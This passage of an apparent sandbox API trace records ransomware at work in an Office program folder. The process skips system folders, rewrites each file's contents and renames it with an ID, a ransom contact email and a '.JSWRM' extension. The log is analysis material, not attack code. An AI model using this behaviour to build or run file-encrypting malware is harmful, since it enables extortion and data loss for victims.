lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0101.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0101.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0101.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0101.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0101.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVPackaging.dll.manifest" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvpackaging.dll.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVPackaging.dll.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvpackaging.dll.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.270] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48a9e4d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x48a9e4d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48cfa7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f8d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVStreamMap.dll", cAlternateFileName="APPVST~1.DLL")) returned 1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2=".") returned 1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="..") returned 1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="...") returned 1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="windows") returned -1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="recovery") returned -1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="perflogs") returned -1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="documents and settings") returned -1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="system volume information") returned -1 [0101.270] lstrcmpiW (lpString1="AppVStreamMap.dll", lpString2="msocache") returned -1 [0101.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVStreamMap.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVStreamMap.dll", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVStreamMap.dll", lpUsedDefaultChar=0x0) returned 17 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVStreamMap.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVStreamMap.dll", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVStreamMap.dll", lpUsedDefaultChar=0x0) returned 17 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.270] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114f5747, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb0f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CommonSequencingProperties.xml", cAlternateFileName="COMMON~1.XML")) returned 1 [0101.270] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2=".") returned 1 [0101.270] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="..") returned 1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="...") returned 1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="windows") returned -1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="recovery") returned -1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="perflogs") returned -1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="documents and settings") returned -1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="system volume information") returned -1 [0101.271] lstrcmpiW (lpString1="CommonSequencingProperties.xml", lpString2="msocache") returned -1 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommonSequencingProperties.xml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommonSequencingProperties.xml", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonSequencingProperties.xml", lpUsedDefaultChar=0x0) returned 30 [0101.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommonSequencingProperties.xml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommonSequencingProperties.xml", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonSequencingProperties.xml", lpUsedDefaultChar=0x0) returned 30 [0101.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0101.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0101.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\CommonSequencingProperties.xml" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\commonsequencingproperties.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.272] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2831) returned 1 [0101.272] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb00) returned 0x205850 [0101.272] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xb00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xb00, lpOverlapped=0x0) returned 1 [0101.273] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.273] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xb00, lpOverlapped=0x0) returned 1 [0101.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0101.274] CloseHandle (hObject=0x45c) returned 1 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0101.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0101.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0101.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0101.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0101.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\CommonSequencingProperties.xml" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\commonsequencingproperties.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\CommonSequencingProperties.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\commonsequencingproperties.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.275] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffdb5707, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffdb5707, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffdb5707, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3b740, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2=".") returned 1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="..") returned 1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="...") returned 1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="windows") returned -1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="recovery") returned -1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="perflogs") returned -1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="documents and settings") returned -1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="system volume information") returned -1 [0101.275] lstrcmpiW (lpString1="concrt140.dll", lpString2="msocache") returned -1 [0101.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0101.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0101.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0101.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0101.276] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa68949f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa68949f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa6d5947, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb260, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Flattener.exe", cAlternateFileName="FLATTE~1.EXE")) returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2=".") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="..") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="...") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="windows") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="recovery") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="perflogs") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="documents and settings") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="$RECYCLE.BIN") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="system volume information") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe", lpString2="msocache") returned -1 [0101.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0101.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flattener.exe", lpUsedDefaultChar=0x0) returned 13 [0101.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0101.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0101.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flattener.exe", lpUsedDefaultChar=0x0) returned 13 [0101.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0101.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0101.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0101.276] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5ca8ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5ca8ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa68949f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Flattener.exe.config", cAlternateFileName="FLATTE~1.CON")) returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2=".") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="..") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="...") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="windows") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="recovery") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="perflogs") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="documents and settings") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="$RECYCLE.BIN") returned 1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="system volume information") returned -1 [0101.276] lstrcmpiW (lpString1="Flattener.exe.config", lpString2="msocache") returned -1 [0101.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe.config", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe.config", cchWideChar=20, lpMultiByteStr=0x240fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flattener.exe.config", lpUsedDefaultChar=0x0) returned 20 [0101.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe.config", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flattener.exe.config", cchWideChar=20, lpMultiByteStr=0x2412e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flattener.exe.config", lpUsedDefaultChar=0x0) returned 20 [0101.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0101.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0101.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\Flattener.exe.config" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\flattener.exe.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.277] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=184) returned 1 [0101.277] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.277] ReadFile (in: hFile=0x45c, lpBuffer=0x2365d8, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2365d8*, lpNumberOfBytesRead=0x345ec04*=0xb0, lpOverlapped=0x0) returned 1 [0101.302] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 